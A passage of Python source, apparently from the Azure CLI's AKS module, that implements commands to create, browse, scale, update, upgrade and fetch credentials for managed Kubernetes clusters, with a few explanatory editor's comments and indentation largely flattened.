elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
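# Editor's note -- shapes produced by the helper above (subscription id is made up):
#
#     _build_role_scope(None, None, '0000-sub')     # -> '/subscriptions/0000-sub'
#     _build_role_scope('my-rg', None, '0000-sub')  # -> '/subscriptions/0000-sub/resourceGroups/my-rg'
#     # An explicit scope is returned unchanged; combining it with a resource
#     # group name raises CLIError because the scope already pins the target.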
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
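# Editor's note -- _resolve_role_id accepts either a role definition GUID (returned as-is)
# or a role name, which is looked up at the given scope. A hypothetical call:
#
#     _resolve_role_id('Monitoring Metrics Publisher', scope, definitions_client)
#     # -> full role definition resource id, e.g. '.../providers/Microsoft.Authorization/roleDefinitions/<guid>'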
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
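# Editor's note -- a minimal illustration of the merge above (hypothetical dicts):
#
#     _update_dict({'count': 3, 'osType': 'Linux'}, {'count': 5})
#     # -> {'count': 5, 'osType': 'Linux'}; dict2 wins on conflicts and neither input is mutated.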
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
# pylint: disable=too-many-statements
def aks_browse(cmd, client, resource_group_name, name, disable_browser=False,
listen_address='127.0.0.1', listen_port='8001'):
if not which('kubectl'):
        raise CLIError('Cannot find kubectl executable in PATH')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
addon_profile = addon_profiles.get("kubeDashboard", ManagedClusterAddonProfile(enabled=True))
if not addon_profile.enabled:
raise CLIError('The kube-dashboard addon was disabled for this managed cluster.\n'
'To use "az aks browse" first enable the add-on\n'
'by running "az aks enable-addons --addons kube-dashboard".')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning('To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
            if b'unknown flag: --address' in err.output:
if listen_address != '127.0.0.1':
logger.warning('"--address" is only supported in kubectl v1.13 and later.')
logger.warning('The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy", "--port", listen_port])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
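# Editor's note -- quick illustration of the truncation above (names are hypothetical):
#
#     _trim_nodepoolname(None)                     # -> 'nodepool1'
#     _trim_nodepoolname('averylongnodepoolname')  # -> 'averylongnod' (first 12 chars)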
def _validate_ssh_key(no_ssh_key, ssh_key_value):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
('omsagent' in result.addon_profiles) and
(hasattr(result.addon_profiles['omsagent'], 'identity')) and
(hasattr(result.addon_profiles['omsagent'].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles['omsagent'].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
        logger.warning('Could not find service principal or user assigned MSI for role '
                       'assignment')
# pylint: disable=too-many-statements,too-many-branches
def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_size=0,
node_osdisk_diskencryptionset_id='',
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
uptime_sla=False,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
vnet_subnet_id=None,
max_pods=0,
min_count=None,
max_count=None,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
zones=None,
enable_node_public_ip=False,
generate_ssh_keys=False, # pylint: disable=unused-argument
api_server_authorized_ip_ranges=None,
enable_private_cluster=False,
enable_managed_identity=False,
attach_acr=None,
enable_aad=False,
aad_admin_group_object_ids=None,
no_wait=False):
_validate_ssh_key(no_ssh_key, ssh_key_value)
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
availability_zones=zones,
enable_node_public_ip=enable_node_public_ip,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type,
mode="System"
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username or windows_admin_password:
        # Handle the case where windows_admin_password is set but windows_admin_username is not
if windows_admin_username is None:
try:
from knack.prompting import prompt
windows_admin_username = prompt('windows_admin_username: ')
                # Even if the user sets windows_admin_username to an empty string here,
                # the validation for admin_username in ManagedClusterWindowsProfile will still fail
except NoTTYException:
raise CLIError('Please specify username for Windows in non-interactive mode.')
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(
msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError(
'Please specify both username and password in non-interactive mode.')
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password)
    # Skip creating a service principal profile for the cluster if the cluster
    # enables managed identity and the customer doesn't explicitly provide a service principal.
    service_principal_profile = None
    principal_obj = None
    if not (enable_managed_identity and not service_principal and not client_secret):
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"),
key_vault_secret_ref=None)
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
        # If service_principal_profile is None, this is an MSI cluster and the service
        # principal does not exist. For now, we just tell the user to grant the
        # permission after the cluster is created, to stay consistent with the portal experience.
if service_principal_profile is None:
logger.warning('The cluster is an MSI cluster, please manually grant '
'Network Contributor role to the system assigned identity '
'after the cluster is created, see '
'https://docs.microsoft.com/en-us/azure/aks/use-managed-identity')
else:
scope = vnet_subnet_id
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_profile.client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
# Attach acr operation will be handled after the cluster is created
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
outbound_type = _set_outbound_type(outbound_type, vnet_subnet_id, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin, pod_cidr, service_cidr, dns_service_ip,
docker_bridge_address, network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
if load_balancer_sku.lower() == "basic":
network_profile = ContainerServiceNetworkProfile(
load_balancer_sku=load_balancer_sku.lower(),
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id
)
monitoring = False
if 'omsagent' in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent'])
aad_profile = None
if enable_aad:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('"--enable-aad" cannot be used together with '
'"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
aad_profile = ManagedClusterAADProfile(
managed=True,
admin_group_object_ids=_parse_comma_separated_list(aad_admin_group_object_ids),
tenant_id=aad_tenant_id
)
else:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
if aad_tenant_id is None:
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
api_server_access_profile = None
if enable_private_cluster and load_balancer_sku.lower() != "standard":
raise CLIError("Please use standard load balancer for private cluster")
if api_server_authorized_ip_ranges or enable_private_cluster:
api_server_access_profile = _populate_api_server_access_profile(
api_server_authorized_ip_ranges,
enable_private_cluster=enable_private_cluster
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
identity = None
if enable_managed_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
mc = ManagedCluster(
location=location,
tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=not disable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
auto_scaler_profile=cluster_autoscaler_profile,
api_server_access_profile=api_server_access_profile,
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id
)
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
# Add AAD session key to header.
    # If principal_obj is None, we will not add this header. This can happen when the
    # cluster enables managed identity; in that case the header is not needed, so it is
    # fine to omit it.
custom_headers = None
if principal_obj:
custom_headers = {'Ocp-Aad-Session-Key': principal_obj.get("aad_session_key")}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
need_pull_for_result = monitoring or (enable_managed_identity and attach_acr)
if need_pull_for_result:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc))
else:
result = sdk_no_wait(no_wait,
client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc,
custom_headers=custom_headers)
if monitoring:
cloud_name = cmd.cli_ctx.cloud.name
                # Add the cluster SPN/MSI 'Monitoring Metrics Publisher' role assignment to publish metrics to MDM.
                # MDM metrics are supported only in the Azure public cloud, so add the role assignment only there.
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if enable_managed_identity and attach_acr:
if result.identity_profile is None or result.identity_profile["kubeletidentity"] is None:
                    logger.warning('Your cluster is successfully created, but we failed to attach ACR to it, '
                                   'you can manually grant permission to the identity named <CLUSTER_NAME>-agentpool '
                                   'in MC_ resource group to give it permission to pull from ACR.')
else:
kubelet_identity_client_id = result.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
return result
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
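# Enable one or more addons on an existing cluster. For the monitoring addon this also
# provisions the Container Insights solution and, in the public cloud, adds the
# 'Monitoring Metrics Publisher' role assignment via _add_monitoring_role_assignment.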
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name, no_wait=no_wait)
if 'omsagent' in instance.addon_profiles and instance.addon_profiles['omsagent'].enabled:
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent'])
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
        # MDM metrics are supported only in the Azure public cloud, so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
else:
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name, name, instance)
return result
def aks_get_versions(cmd, client, location):
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False, context_name=None):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
ADDONS = {
'http_application_routing': 'httpApplicationRouting',
'monitoring': 'omsagent',
'virtual-node': 'aciConnector',
'kube-dashboard': 'kubeDashboard'
}
def aks_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_nulls(list(managed_clusters))
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def aks_update_credentials(cmd, client, resource_group_name, name,
reset_service_principal=False,
reset_aad=False,
service_principal=None,
client_secret=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_client_app_id=None,
aad_tenant_id=None,
no_wait=False):
if bool(reset_service_principal) == bool(reset_aad):
raise CLIError('usage error: --reset-service-principal | --reset-aad-profile')
if reset_service_principal:
if service_principal is None or client_secret is None:
raise CLIError('usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
return sdk_no_wait(no_wait,
client.reset_service_principal_profile,
resource_group_name,
name, service_principal, client_secret)
if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
'--aad-server-app-secret SECRET [--aad-tenant-id ID]')
parameters = {
'clientAppID': aad_client_app_id,
'serverAppID': aad_server_app_id,
'serverAppSecret': aad_server_app_secret,
'tenantID': aad_tenant_id
}
return sdk_no_wait(no_wait,
client.reset_aad_profile,
resource_group_name,
name, parameters)
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
        raise CLIError('There is more than one node pool in the cluster. '
                       'Please specify the node pool name or use the "az aks nodepool" command to scale a node pool.')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
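# Update mutable cluster settings (autoscaler, autoscaler profile, load balancer profile,
# ACR attachment, API server authorized IP ranges, managed AAD, SKU). At least one
# supported option must be supplied, otherwise a usage error is raised below.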
# pylint: disable=inconsistent-return-statements
def aks_update(cmd, client, resource_group_name, name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None,
uptime_sla=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
attach_acr=None,
detach_acr=None,
api_server_authorized_ip_ranges=None,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
update_aad_profile = not (aad_tenant_id is None and aad_admin_group_object_ids is None)
# pylint: disable=too-many-boolean-expressions
if (update_autoscaler != 1 and cluster_autoscaler_profile is None and
not update_lb_profile and
not attach_acr and
not detach_acr and
not uptime_sla and
api_server_authorized_ip_ranges is None and
not enable_aad and
not update_aad_profile):
        raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
                       '"--disable-cluster-autoscaler" or '
                       '"--update-cluster-autoscaler" or '
                       '"--cluster-autoscaler-profile" or '
                       '"--load-balancer-managed-outbound-ip-count" or '
                       '"--load-balancer-outbound-ips" or '
                       '"--load-balancer-outbound-ip-prefixes" or '
                       '"--load-balancer-outbound-ports" or '
                       '"--load-balancer-idle-timeout" or '
                       '"--attach-acr" or "--detach-acr" or '
                       '"--uptime-sla" or '
                       '"--api-server-authorized-ip-ranges" or '
                       '"--enable-aad" or '
                       '"--aad-tenant-id" or '
                       '"--aad-admin-group-object-ids"')
instance = client.get(resource_group_name, name)
# For multi-agent pool, use the az aks nodepool command
if update_autoscaler > 0 and len(instance.agent_pool_profiles) > 1:
        raise CLIError('There is more than one node pool in the cluster. Please use the "az aks nodepool" command '
                       'to update per-node-pool autoscaler settings.')
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
            logger.warning('Cluster autoscaler is already enabled for this node pool.\n'
                           'Please run "az aks update --update-cluster-autoscaler" '
                           'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
            raise CLIError('Cluster autoscaler is not enabled for this node pool.\n'
                           'Run "az aks update --enable-cluster-autoscaler" '
                           'to enable the cluster autoscaler with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already disabled for this node pool.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
# if intention is to clear autoscaler profile
if cluster_autoscaler_profile == {}:
instance.auto_scaler_profile = {}
# else profile is provided, update instance profile if it exists
elif cluster_autoscaler_profile:
instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
dict((key.replace("-", "_"), value)
for (key, value) in cluster_autoscaler_profile.items())) \
if instance.auto_scaler_profile else cluster_autoscaler_profile
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if instance.identity is not None and instance.identity.type == "SystemAssigned":
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
            raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
                           'Please do not set --attach-acr or --detach-acr. '
                           'You can manually grant or revoke permission to the identity named '
                           '<CLUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
if uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(api_server_authorized_ip_ranges, instance=instance)
if enable_aad:
if instance.aad_profile is not None and instance.aad_profile.managed:
raise CLIError('Cannot specify "--enable-aad" if managed AAD is already enabled')
instance.aad_profile = ManagedClusterAADProfile(
managed=True
)
if update_aad_profile:
if instance.aad_profile is None or not instance.aad_profile.managed:
raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids"'
' if managed AAD is not enabled')
if aad_tenant_id is not None:
instance.aad_profile.tenant_id = aad_tenant_id
if aad_admin_group_object_ids is not None:
instance.aad_profile.admin_group_object_ids = _parse_comma_separated_list(aad_admin_group_object_ids)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
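# Upgrade the control plane and, unless only the control plane is requested, all node pools
# to the given Kubernetes version. Legacy clusters (VMAS based or with max_agent_pools < 8)
# are always upgraded together with their node pools.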
# pylint: disable=unused-argument,inconsistent-return-statements
def aks_upgrade(cmd, client, resource_group_name, name, kubernetes_version, control_plane_only=False,
no_wait=False, yes=False):
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
